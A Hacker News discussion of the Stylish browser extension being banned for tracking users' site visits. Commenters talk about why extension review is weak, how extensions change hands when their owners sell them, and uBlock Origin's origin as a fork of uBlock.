
“Stylish” extension with 2M downloads banned for tracking every site visit - jhack
https://arstechnica.com/information-technology/2018/07/stylish-extension-with-2m-downloads-banished-for-tracking-every-site-visit/
======
dagenix
This type of thing seems to keep happening. And there doesn't seem to be a
good solution. Browser vendors don't want to scrutinize every extension
available on their platforms since there is no financial incentive to.
Notably, I don't think extension authors want browser vendors to scrutinize
their extensions as that would delay getting out updates and fixes. Users want
vendors to catch all the bad stuff, but would probably be outraged on behalf
of their favorite extension the second any review process went away (ie: users
want the magical no downside approach).

So, it's not really clear to me than anyone really wants a real review process
created.

However, any extension which becomes popular instantly is put under pressure
to sell to someone else who wants to do this type of nonsense. Of course, the
extension author may not know which companies that want to buy their work want
to viloate user privacy and which don't - they just have an offer to pay for
their work. So, even the authors that sell aren't necessarily doing anything
wrong (at least not intentionally).

And there doesn't really seem to be a way for browser vendors to alert users
when ownership of an extension changes - they may not even know, and even if
they did, it seems unlikely that most users would know what to do with that
information.

There just doesn't seem to be anyone in this whole process that really has an
incentive to make things better. It seems like the only reasonable advice is
to avoid extensions or only use extensions from major companies - which is
kinda sad advice.

~~~
eridius
> _Browser vendors don 't want to scrutinize every extension available on
> their platforms since there is no financial incentive to._

This is precisely what Apple tried to do with the Safari Extensions Gallery,
and they got pilloried for it.

------
LinuxBender
Could they have captured banking or other financial or sensitive data?

The author used burp, but couldn't you also validate what is collected more
explicitly by viewing the xpi contents for that add-on?

~~~
silverwind
Yes, this should have been noticed during the mandatory code review that every
extension has to undergo.

------
JdeBP
Still open discussion of the original, of which this is a news report:

* [https://news.ycombinator.com/item?id=17447816](https://news.ycombinator.com/item?id=17447816)

------
stephengillie
It's remarkable that uMatrix and uBlock Origin haven't sold out yet. What will
we do if/when they do?

~~~
jwalton
(This is a bit of an oversimplification, but...) uBlock Origin is already the
fork of uBlock from when uBlock sold out.

